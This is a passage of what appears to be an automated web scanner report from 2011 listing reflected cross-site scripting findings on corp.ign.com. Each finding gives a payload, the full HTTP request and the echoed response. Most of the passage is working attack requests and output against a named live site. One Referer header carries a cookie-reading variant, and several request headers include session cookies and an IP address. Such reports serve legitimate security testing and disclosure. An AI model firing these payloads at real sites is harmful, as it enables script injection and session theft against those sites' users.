   <title>IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmedia.ign.c
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/?9b7ed"><script>alert(1)</script>f5dfe5b827b=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.130. http://corp.ign.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64dab"-alert(1)-"8250c170f0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?64dab"-alert(1)-"8250c170f0f=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:07 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c0a-23512-754088152-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:07 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041247165v-1n-12mc+1297041247165mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 41786

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmedia.ign.c
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/?64dab"-alert(1)-"8250c170f0f=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.131. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3545f"><script>alert(1)</script>64dc66e49d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/?3545f"><script>alert(1)</script>64dc66e49d8=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:17 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-13272-1058715362-10;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:17 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041257624v-1n-12mc+1297041257624mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 11891

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>About - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmed
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/about/?3545f"><script>alert(1)</script>64dc66e49d8=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.132. http://corp.ign.com/about/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f2a"-alert(1)-"9641413a5ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/?31f2a"-alert(1)-"9641413a5ee=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:18 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c07-32463-1028516919-4;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:18 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041258856v-1n-12mc+1297041258856mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 11864

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>About - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmed
...[SNIP]...
ript>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/about/?31f2a"-alert(1)-"9641413a5ee=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.133. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 503cb"-alert(1)-"685e224789c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /careers/?503cb"-alert(1)-"685e224789c=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:38 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-24287-1051492698-9;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:38 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041278968v-1n-12mc+1297041278968mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 13539

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Careers - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/careers/?503cb"-alert(1)-"685e224789c=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.134. http://corp.ign.com/careers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /careers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68bd2"><script>alert(1)</script>5ab56f15f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /careers/?68bd2"><script>alert(1)</script>5ab56f15f1=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:37 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c02-23694-975905572-7;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:37 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041277786v-1n-12mc+1297041277786mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 13567

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Careers - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/careers/?68bd2"><script>alert(1)</script>5ab56f15f1=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.135. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f513d"><script>alert(1)</script>ff5d7b0b388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?f513d"><script>alert(1)</script>ff5d7b0b388=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:32 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-2421-363698782-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:32 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041272498v-1n-12mc+1297041272498mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 39236

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<style>
/*
Copyright (c) 2009, Yahoo! In
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/contact/?f513d"><script>alert(1)</script>ff5d7b0b388=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.136. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f98d"-alert(1)-"8146d2ee5ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact/?9f98d"-alert(1)-"8146d2ee5ef=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:34 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c03-25644-697037626-2;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:34 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041274241v-1n-12mc+1297041274241mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 39203

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<style>
/*
Copyright (c) 2009, Yahoo! In
...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/contact/?9f98d"-alert(1)-"8146d2ee5ef=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.137. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /feeds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 807fa"><script>alert(1)</script>9309c865802 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds.html?807fa"><script>alert(1)</script>9309c865802=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:51 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c09-18145-575922217-15;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:51 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041291833v-1n-12mc+1297041291833mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 27855

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Feeds - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmed
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/feeds.html?807fa"><script>alert(1)</script>9309c865802=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.138. http://corp.ign.com/feeds.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /feeds.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e38ca"-alert(1)-"82e5bbb9546 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feeds.html?e38ca"-alert(1)-"82e5bbb9546=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:53 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c01-3558-1410444593-3;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:53 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041293242v-1n-12mc+1297041293242mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 27825

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Feeds - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpmed
...[SNIP]...
>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/feeds.html?e38ca"-alert(1)-"82e5bbb9546=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.139. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9105f"><script>alert(1)</script>afaaba52a84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy.html?9105f"><script>alert(1)</script>afaaba52a84=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:49 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-1241498032-5;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:49 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041289911v-1n-12mc+1297041289911mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 25988

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Privacy Policy - IGN Entertainment</title>
   <link rel="stylesheet" href="http:
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/privacy.html?9105f"><script>alert(1)</script>afaaba52a84=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.140. http://corp.ign.com/privacy.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /privacy.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8174"-alert(1)-"21ae41754ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /privacy.html?a8174"-alert(1)-"21ae41754ed=1 HTTP/1.1
Host: corp.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:14:51 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: decc=US;Path=/;Domain=.ign.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: NGUserID=a016c04-12684-535296845-1;Path=/;Domain=.ign.com;Expires=Tue, 06-Aug-30 01:14:51 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.ign.com
Set-Cookie: freq=c-1297041291349v-1n-12mc+1297041291349mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 25954

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Privacy Policy - IGN Entertainment</title>
   <link rel="stylesheet" href="http:
...[SNIP]...
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/privacy.html?a8174"-alert(1)-"21ae41754ed=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.141. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /properties/ign.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9015"-alert(1)-"285d6843639 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /properties/ign.html?a9015"-alert(1)-"285d6843639=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
Referer: http://corp.ign.com/?64dab%22-alert(document.cookie)-%228250c170f0f=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297041142.2; __utmc=173446715; s_pers=%20s_nr%3D1297041153777%7C1299633153777%3B%20s_lv%3D1297041153779%7C1391649153779%3B%20s_lv_s%3DFirst%2520Visit%7C1297042953779%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_c13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_sq%3D%3B; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; decc=US; NGUserID=a016c08-31833-869633041-5; i18n-cc=US; freq=c-1297041296732v-1n-12mc+1297041296732mv+0mn+0wwe~0; __utma=1.1277650538.1297041360.1297041360.1297041360.1; __utmb=1; __utmc=1; __utmz=1.1297041360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; __utmb=173446715; _br_uid_1=uid%3D3168630853761%3A

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:59:57 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297041296732v-2n-12mc+1297041296732mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 8476

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>IGN.com - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...
eof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/properties/ign.html?a9015"-alert(1)-"285d6843639=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.142. http://corp.ign.com/properties/ign.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /properties/ign.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70a21"><script>alert(1)</script>57433fb9041 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /properties/ign.html?70a21"><script>alert(1)</script>57433fb9041=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
Referer: http://corp.ign.com/?64dab%22-alert(document.cookie)-%228250c170f0f=1
X-Requested-With: XMLHttpRequest
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297041142.2; __utmc=173446715; s_pers=%20s_nr%3D1297041153777%7C1299633153777%3B%20s_lv%3D1297041153779%7C1391649153779%3B%20s_lv_s%3DFirst%2520Visit%7C1297042953779%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_c13%3Dmy.ign.com%253Axbox360.ign.com%3B%20s_sq%3D%3B; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=10089; decc=US; NGUserID=a016c08-31833-869633041-5; i18n-cc=US; freq=c-1297041296732v-1n-12mc+1297041296732mv+0mn+0wwe~0; __utma=1.1277650538.1297041360.1297041360.1297041360.1; __utmb=1; __utmc=1; __utmz=1.1297041360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; __utmb=173446715; _br_uid_1=uid%3D3168630853761%3A

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:59:51 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297041296732v-2n-12mc+1297041296732mv+0mn+0wwe~0;Path=/;Domain=.ign.com
Content-Length: 8507

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>IGN.com - IGN Entertainment</title>
   <link rel="stylesheet" href="http://corpm
...[SNIP]...
